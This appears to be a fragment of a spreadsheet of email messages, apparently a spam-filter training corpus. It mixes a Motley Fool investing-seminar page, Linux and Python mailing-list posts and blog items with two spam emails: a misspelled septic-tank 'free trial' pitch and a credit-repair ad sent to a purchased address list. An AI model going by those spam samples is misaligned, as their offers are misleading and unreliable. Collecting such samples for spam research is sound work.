 &lt;P&gt;So dust off the old calculator, find your company's financials, and get to work. Quarterly financial data is best found in company 10-Qs, and annual data is best found in company 10-Ks. You should be able to find all of this information using financials from either the company website or at Fool.com on the &lt;A href="http://www.fool.com/m.asp?i=690024"&gt;Quotes &amp; Data&lt;/A&gt; area. &lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;Feeling a little lost?&lt;BR&gt;&lt;/STRONG&gt;If you're new to using SEC filings, read this &lt;A href="http://www.fool.com/m.asp?i=690025"&gt;overview of financial statements&lt;/A&gt;. Above all else, just do your best. Once you've done what you can, report your findings to your teammates! We've also put together an ongoing list of resources so you can dive in a little deeper. You can click on the "Lesson Resources" link in the right column or &lt;A href="http://www.fool.com/m.asp?i=690026"&gt;click here&lt;/A&gt; to find more resources to help you better understand financial statements, general investing equations, and stock options.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;Matt and I will be joining you on &lt;A href="http://boards.fool.com/Boards.asp?fid=10075"&gt;the boards&lt;/A&gt; with our own analyses, so you can examine our processes.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;Fool on!&lt;/P&gt;
 &lt;P&gt;Bill and Matt&lt;/P&gt;
 &lt;/font&gt;
 &lt;br /&gt;&lt;br /&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td width="176" bgcolor="#CCCC99" valign="top"&gt;
 &lt;table cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="24" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_announcements.gif" width="176" height="13" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="5" cellpadding="0" border="0" width="176"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;
 &lt;table cellspacing="0" cellpadding="4" border="0" width="100%"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#ffffcc"&gt;
 &lt;font face="arial,geneva, sans-serif" size="-2"&gt;
 &lt;P&gt;In case you missed this week's earlier announcement, please note that there is a correction to Lesson 1.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;The fifth automatic sell rule regarding stock option grants should read:&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P dir=ltr style="MARGIN-RIGHT: 0px"&gt;&lt;EM&gt;We set &lt;STRONG&gt;3%&lt;/STRONG&gt; as our maximum for developed companies, &lt;STRONG&gt;5%&lt;/STRONG&gt; for developing ones (use $500 million in sales as a rough boundary between the two).&lt;/EM&gt;&lt;/P&gt;
 &lt;P dir=ltr style="MARGIN-RIGHT: 0px"&gt;&lt;/P&gt;
 &lt;P dir=ltr style="MARGIN-RIGHT: 0px"&gt;You can read the correct lesson in its entirety by clicking on "Lesson 1" below.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;If you have any questions, hit your &lt;A href="http://boards.fool.com/Boards.asp?fid=10075"&gt;team board &lt;/A&gt;and ask away!&lt;/P&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="20" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_lessonplan.gif" width="176" height="13" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="0" cellpadding="4" border="0"&gt;
 &lt;tr&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td rowspan="20"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690029"&gt;Lesson 1: On Selling&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690030"&gt;Lesson 2: Companies Gone Wrong&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;
 Lesson 3: Gut Checks and Safety Valves
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;
 Lesson 4: When a Company Becomes Overvalued
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;
 Lesson 5: Report Card Part 1 - Business Prospects
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;
 Lesson 6: Report Card Part 2 - Valuation
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;
 Lesson 7: Panning for Panera
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;
 Lesson 8: The Report in Action - Johnson &amp; Johnson
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="20" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_seminarhelp.gif" width="176" height="13" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="0" cellpadding="4" border="0"&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td rowspan="20"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690031"&gt;&lt;b&gt;Start Page&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690032"&gt;&lt;b&gt;Orientation&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690033"&gt;&lt;b&gt;Downloads&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690034"&gt;&lt;b&gt;Lesson Resources&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690035"&gt;&lt;b&gt;Discussion Board Intro&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690036"&gt;&lt;b&gt;Discussion Board FAQ&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690037"&gt;&lt;b&gt;How Do I...?&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690038"&gt;&lt;b&gt;Choose Your Team&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="20" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_lessonresources.gif" width="176" height="13" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="0" cellpadding="4" border="0"&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td rowspan="20"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690039"&gt;Operating Cash Flow&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690040"&gt;Free cash flow&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690041"&gt;Lessons from Lucent&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690042"&gt;Log Sheet&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.lnksrv.com/m.asp?i=690043"&gt;Yahoo! Bond Center&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690044"&gt;Do Big-Cap Tech Stocks Mean Big Risk?&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_caret.gif" width="6" height="10" border="0" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;font face="arial,geneva,sans-serif" size="-2"&gt;
 &lt;b&gt;&lt;a href="http://www.fool.com/m.asp?i=690045"&gt;Overview of Financial Statements&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td background="http://g.fool.com/art/new/seminars/templates/EV_rightside.gif" width="6"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="6" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td background="http://g.fool.com/art/new/seminars/templates/EV_Footer_L.gif"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_Footer_L.gif" width="6" height="21" /&gt;&lt;/td&gt;
 &lt;td bgcolor="#336699"&gt;
 &lt;table cellspacing="0" cellpadding="4" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face="verdana,arial,helvetica,geneva,sans-serif" size="-2" color="#e5e5e5"&gt;
 							This Seminar contains the opinions and ideas of The Motley Fool. It is provided with the understanding that The Motley Fool is not engaged in rendering financial or other professional services. The Motley Fool specifically disclaims any responsibility for any liability, loss, or risk, personal or otherwise, which is incurred as a consequence, directly or indirectly, of the use and application of any of the contents of this Seminar.&lt;br /&gt;&lt;br /&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690046"&gt;&lt;font color="#e5e5e5"&gt;Legal Information&lt;/font&gt;&lt;/a&gt;. Copyright  1995-2002 The Motley Fool. All rights reserved.
 							&lt;img src="http://g.fool.com/art/free/Seminars/events/wts__1x1.gif" border="0" width="1" height="1" /&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td background="http://g.fool.com/art/new/seminars/templates/EV_Footer_R.gif"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_Footer_R.gif" width="6" height="21" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_BL.gif" width="6" height="6" /&gt;&lt;/td&gt;
 &lt;td background="http://g.fool.com/art/new/seminars/templates/EV_Bottom.gif"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_BR.gif" width="6" height="6" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --Groovy-Foolish-Boundary-2A6F4DA4EE1F4ABCB782--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Joseph S. Barrera III wrote:
 &gt; Reza B'Far (eBuilt) wrote:
 &gt;  &gt; problems.... Why do most computer scientists insist on solving the
 &gt;  &gt; same problems over and over again when there are some many more
 &gt;  &gt; important and interesting problems (high level) to be solved ?????
 &gt;
 &gt; Amen!
 Like what exactly? All the problems are in chemisty and physics and biology
 and mathematics. We're just enablers :)
 &gt; Doing it in an (unecessarily) harder way does NOT make you more of a man
 &gt; (or less of a kiddie).
 Yes, but doing it an order of magnitude or 2 easier does :) Which with the
 way things are now, is not hard at all to do.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] OT: DNS MX Record Clarification Please
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This may be a little off topic but thought people here would have a better
 response to this elsewhere.
 I have setup two MX records (mail and bmail) for my mail server. The one I
 gave a 10 (bmail) the other a 20 (mail).
 bmail(10) I gave a 10 because I want all mail to go through this server to
 be scanned for SPAM and viruses and then relayed to the mail(20) server for
 delivery.
 As I understand it, DNS A records are used in a rotating fashion for load
 balancing, but DNS MX records are used in order or prority, meaning the 10
 before the 20 and only 20 if the 10 isn't available.
 But only some of the mail is actually being scanned which leads me to
 believe that not all of the mail is actually hitting that box and the 10
 never goes down. Why? Have I got something confused here?
 Thanks,
 V
 ------- End of Forwarded Message -------
 -- 
 This message has been scanned for viruses and
 dangerous content by MailScanner at comp-wiz.com,
 and is believed to be clean.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</si>
  <si>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&gt; 
 &gt; Thought this was funny.
 &gt; In the slashdot thread about
 &gt; EW Dijkstra passing away on
 &gt; tuesday, there was:
 &gt; 
 &gt; GOTO Heaven
 &gt;        Re:GOTO Heaven
 &gt;        I'll bet he gets there by the shortest path.
 &gt; 
 &gt; Referring to his "Goto considered harmful" etc.
 &gt; 
 &gt; Sad to see these people go. 3 others I've
 &gt; noticed lately were: Richard Stevens, Jim Ellis
 &gt; and Jon Postel.
 &gt; 
 &gt; Pdraig.
 Interesting. I've always wondered about things 'considered' to be bad. 
 Example the GOTO, most languages support a goto of some sort, so are gotos really bad?
 Is a loop or a recursive call actually any better than a goto 
 or is the goto used as a kind of common enemy of 
 programming syntax
 to make sure people use loops or recursion?
 &lt;&lt;To iterate is human, to recurse divine&gt;&gt;
 Kind of makes you wonder about things considered to be 'good'.
 For example people bang on about polymorphism, but is there actually any advantage in using an overloaded function based on class inheritance?
 Hmm.
 I'm only laughing on the outside 
 My smile is just skin deep 
 If you could see inside I'm really crying 
 You might join me for a weep.
 &lt;&lt;At your service Madame&gt;&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Danger Hiptop reviewed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85511986
 Date: Not supplied
 The T-Mobile Sidekick -- the first commercial implementation of the wonderful 
 Danger Hiptop PDA/phone -- is now onsale and the reviews are starting to 
 appear. As soon as I'm in San Francisco for more than a couple days straight, I 
 really think I'm going to pick this up. 
     That's partly because it costs less than half as much as its current 
     competitors -- $199, compared with $450 and up for the others. In the same 
     spirit, T-Mobile will offer unlimited data usage on its new, relatively 
     high- speed "GPRS" network for $40 per month -- far below what a serious 
     surfer would likely rack up under competing wireless-data plans. (Voice 
     time is another story -- more on that later.) 
     Another reason I like the Sidekick's prospects: It was designed for, and 
     will be pitched to, a very different market. While vendors of the competing 
     hybrids focus on "enterprise" customers -- the big businesses that are 
     supposed to have deep pockets for this sort of thing (even though most 
     clearly don't at this point) -- Danger and T-Mobile are targeting, in their 
     own words, "Internet-savvy, primarily urban, young adults in the 18- to 
     34-year-old demographic." 
 I am that demographic! Link[1] Discuss[2] (_Thanks, Steve[3]!_)
 [1] http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/09/30/BU202936.DTL
 [2] http://www.quicktopic.com/boing/H/LMAtpjUTbVezf
 [3] http://www.portigal.com
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; OTOH, my Data/ subtree currently has more than 35,000 files slobbering
 &gt; over 134 million bytes -- even if I had a place to put that much stuff,
 &gt; I'm not sure my ISP would let me email it in one msg &lt;wink&gt;.
 [Skip]
 &gt; Do you have a dialup or something more modern &lt;wink&gt;?
 Much more modern:  a cable modem with a small upload rate cap.  There's a
 reason the less modern uncapped @Home went out of business &lt;wink&gt;.
 &gt; 134MB of messages zipped would probably compress pretty well - under 50MB
 &gt; I'd guess with all the similarity in the headers and such.  You could zip
 &gt; each of the 10 sets individually and upload them somewhere.
 I suppose this could finish over the course of an afternoon.  Now where's
 "somewhere"?  I expect we'll eventually collect several datasets;
 SourceForge isn't a good place for it (they expect projects to distribute
 relatively small code files, and complain if even those get big).
 &gt; ...
 &gt; How about random sampling lots of public mailing lists via gmane or
 &gt; something similar, manually cleaning it (distributing that load over a
 &gt; number of people) and then relying on your clever code and your
 &gt; rebalancing script to help further cleanse it?
 What then are we training the classifier to do?  Graham's scoring scheme is
 based on an assumption that the ham-vs-spam task is *easy*, and half of that
 is due to that the ham has a lot in common.  It was an experiment to apply
 his scheme to all the comp.lang.python traffic, which is a lot broader than
 he had in mind (c.l.py has long had a generous definition of "on topic"
 &lt;wink&gt;).  I don't expect good things to come of making it ever broader,
 *unless* your goal is to investigate just how broad it can be made before it
 breaks down.
 &gt; The "problem" with the ham is it tends to be much more tied to one person
 &gt; (not just intimate, but unique) than the spam.
 Which is "a feature" from Graham's POV:  the more clues, the better this
 "smoking guns only" approach should work.
 &gt; I save all incoming email for ten days (gzipped mbox format) before it
 rolls
 &gt; over and disappears.  At any one time I think I have about 8,000-10,000
 &gt; messages.  Most of it isn't terribly personal (which I would cull before
 &gt; passing along anyway) and much of it is machine-generated, so would be of
 &gt; marginal use.  Finally, it's all ham-n-spam mixed together.  Do we call
 &gt; that an omelette or a Denny's Grand Slam?
 Unless you're volunteering to clean it, tag it, package it, and distribute
 it, I'd call it irrelevant &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Colophon 3
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#colophon_3
 Date: 2002-10-01T00:23:58-05:00
 _Dean Allen_: About the author[1]. &amp;#8220;The funniest thing Dean has ever 
 witnessed was some footage of narcoleptic dogs in a Nova documentary on sleep 
 disorders.&amp;#8221;
 [1] http://www.textism.com/about/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Septic tank care. (Free Trail)COKXWEJ
</t>
  </si>
  <si>
    <t xml:space="preserve">If your home is served by a septic system, you will be
 able to receive invaluable information on how to
 eliminate pump outs, maintain the system properly for FREE !!!
 Our packetge will cure problems such as backups, wet spots, odor, etc.
 You can start this FREE trial by checking out our SPC program at:
    http://www.abc-holdings.info/spc/
 Please takes a mintuet to fill out the form, and we will send out your free trail packetage.
</t>
  </si>
  <si>
    <t xml:space="preserve">On July 21, paul@clubi.ie said:
 &gt; 
 &gt; reiser's handles to files are hashes i believe. fat: dont think you 
 &gt; can make symlinks on it.
 You can't; hard links only. And those get cleaned up by ScanDisk as
 "cross-linked files". Shortcuts are the Windows analogue of symlinks,
 and they don't work outside the Windows environment - i.e. they're an
 artifact of the OS rather than the FS.
 Cheers.
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me.
 "if you can't live the lie, let it die/and if you can't live a life filled
  with strife/honey, just say oops/and jump through hoops/and get to the end of
  the line" - FLC, "Bear Hug" (Come Find Yourself)
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Repair your credit online!                 MNW
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://365.sunshinehui.com/creditfix/email/background_arrow.gif WID=
 TH=3D400&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1320&amp;mid=3D15001=
 &gt;&lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/banner_email.gif BO=
 RDER=3D0&gt;&lt;/A&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1320&amp;mid=3D15001&gt;&lt;im=
 g src=3Dhttp://365.sunshinehui.com/creditfix/email/body_email.gif alt=3D""=
  border=3D"0"&gt;&lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1320-15001.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your 
